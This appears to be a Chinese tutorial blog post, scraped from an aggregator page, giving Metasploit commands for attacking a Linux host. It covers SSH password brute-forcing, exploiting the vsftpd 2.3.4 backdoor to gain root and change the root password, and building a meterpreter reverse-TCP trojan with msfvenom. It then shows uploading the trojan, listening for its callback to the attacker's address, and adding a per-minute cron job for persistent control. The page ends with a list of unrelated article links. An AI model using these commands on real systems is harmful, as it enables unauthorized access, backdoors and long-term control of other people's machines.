当前位置: 首页 > news >正文

linux暴力破解漏洞利用

===========禁止做非法操作,仅限参考=

暴力破解

  • 编辑密码本(vim password.txt)
  • 无声进入msf(msfconsole -q)
  • 搜索ssh_login相关程序(search ssh_login)
  • 设置攻击参数(use 0)
    设置用户名(set username msfadmin)
    设置密码本(set pass_file /root/password.txt)
    设置攻击目标(set rhosts 192.168.10.143)
  • 发起攻击(运行run)
  • 查看攻击会话(sessions)
  • 进入某个会话(sessions ID)
  • 退出(exit)
  • show options://显示程序运行时所需要的参数

漏洞利用

  • 扫描目标是否存在“笑脸漏洞(vsftpd2.3.4)”(nmap -sV ip)
  • 发起漏洞利用
    进入msf(msfconsole)
    搜索vsftpd(search vsftpd)
    使用程序(use 0)
    设置攻击目标(set rhosts ip)
  • 发起攻击(run)
  • whoami://查看是哪个用户
  • passwd root:// 设置密码

植入木马,达到长期控制的目的

  • msfvenom:攻击载荷生成器
    -p://选择一个载荷
    -f://生成文件格式 (linux可执行的程序文件:elf,windows可执行的文件:exe)
    lhost://监听地址(攻击机kali的地址)
    lport://监听端口(攻击机kali的端口)
    -o:指定输出的文件名
    -h:查看帮助
  • msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf lhost=192.168.10.224 lport=4444 -0 shell: // 给主机192.168.10.224,生成一个名为shell,端口为4444的木马程序

为了防止上传报错,需要修改kali的ssh配置

  • 创建.ssh目录
    mkdir .ssh
  • 配置config
    vim .ssh/config
  • 添加三行配置
  • Host
  • HostkeyAlgorithms +ssh-rsa
  • PubkeyAcceptedKeyTypes +ssh-rsa
  • 以root身份上传shell后门到192.168.10.143的/mnt
    scp shell root@192.168.10.143:/mnt

运行shell

  • 手动运行shell后门程序
    /mnt/shell & (&后台运行)
  • 在kali中侦听木马程序
  • 进入msf
    msfconsole
  • 使用侦听程序
    use exploit/multi/handler
  • 设置监听地址
    set lhost 192.168.10.224
  • 设置监听端口
    set lport 4444
  • 设置载荷
    set payload linux/x86/meterpreter/reverse_tcp
  • 运行
    run
    ps:侦听模块在侦听木马上线的时候参数值必须与生成木马的参数一致

如果想要让木马长期运行不被kill,需要做计划任务,定期运行

  • 编辑计划任务:
  • EDITOR:编辑器
    EDITOR=vim crontab -e
            • /mnt/shell&(每分钟运行一次)
  • 再次进入msf
  • 使用侦听程序
    use exploit/multi/handler
  • 设置监听地址
    set lhost 192.168.10.224
  • 设置监听端口
    set lport 4444
  • 设置载荷
    set payload linux/x86/meterpreter/reverse_tcp
  • 运行
    run
  • 查看计划任务
    crontab -l
  • meterpreter>下将会话放到后台
    background

相关文章:

  • 扑克牌游戏
  • 开封市建筑设计资质在线申报系统操作演示
  • python虚拟环境venv的安装--ubuntu
  • Arm发布Cortex X925、A725、A520,Armv9.2架构
  • Java如何实现pdf转base64以及怎么反转?
  • Java通过Html(ftl模板)生成PDF实战, 可支持商用
  • 从零学会【分镜头意识】拍摄思维
  • 一个与 WSL2 建立远程的简单方法
  • 基于朴素贝叶斯算法的新闻类型预测,django框架开发,前端bootstrap,有爬虫有数据库
  • 数字认证携手华为鸿蒙生态,升级智慧办公新体验
  • 【Qt】探索Qt绘图世界:自定义控件与视觉效果的全面指南
  • ggplot2绘图如何根据一个变量即区分颜色又区分深浅?
  • 超强算力 Orange Pi Kunpeng Pro 开发板基础测评与体验
  • pyqt绘制各种直线
  • LLM基础知识
  • 2018以太坊智能合约编程语言solidity的最佳IDEs
  • C++回声服务器_9-epoll边缘触发模式版本服务器
  • HTML-表单
  • Javascript弹出层-初探
  • JavaScript设计模式与开发实践系列之策略模式
  • k8s如何管理Pod
  • NLPIR语义挖掘平台推动行业大数据应用服务
  • supervisor 永不挂掉的进程 安装以及使用
  • 简单实现一个textarea自适应高度
  • 将回调地狱按在地上摩擦的Promise
  • 排序算法之--选择排序
  • 如何设计一个微型分布式架构?
  • 通过获取异步加载JS文件进度实现一个canvas环形loading图
  • HanLP分词命名实体提取详解
  • 你学不懂C语言,是因为不懂编写C程序的7个步骤 ...
  • ​Python 3 新特性:类型注解
  • #LLM入门|Prompt#2.3_对查询任务进行分类|意图分析_Classification
  • $ git push -u origin master 推送到远程库出错
  • (1)Nginx简介和安装教程
  • (4)事件处理——(7)简单事件(Simple events)
  • (C语言)strcpy与strcpy详解,与模拟实现
  • (C语言)球球大作战
  • (Redis使用系列) Springboot 实现Redis 同数据源动态切换db 八
  • (附源码)计算机毕业设计SSM疫情下的学生出入管理系统
  • (利用IDEA+Maven)定制属于自己的jar包
  • (免费领源码)Python#MySQL图书馆管理系统071718-计算机毕业设计项目选题推荐
  • (一)认识微服务
  • (转) Face-Resources
  • ... fatal error LINK1120:1个无法解析的外部命令 的解决办法
  • .NET 8 中引入新的 IHostedLifecycleService 接口 实现定时任务
  • .net core IResultFilter 的 OnResultExecuted和OnResultExecuting的区别
  • .Net Core 微服务之Consul(三)-KV存储分布式锁
  • .Net IE10 _doPostBack 未定义
  • .Net Redis的秒杀Dome和异步执行
  • .Net语言中的StringBuilder:入门到精通
  • /*在DataTable中更新、删除数据*/
  • @Bean有哪些属性
  • @Responsebody与@RequestBody
  • [ C++ ] template 模板进阶 (特化,分离编译)
  • [ CTF ] WriteUp- 2022年第三届“网鼎杯”网络安全大赛(白虎组)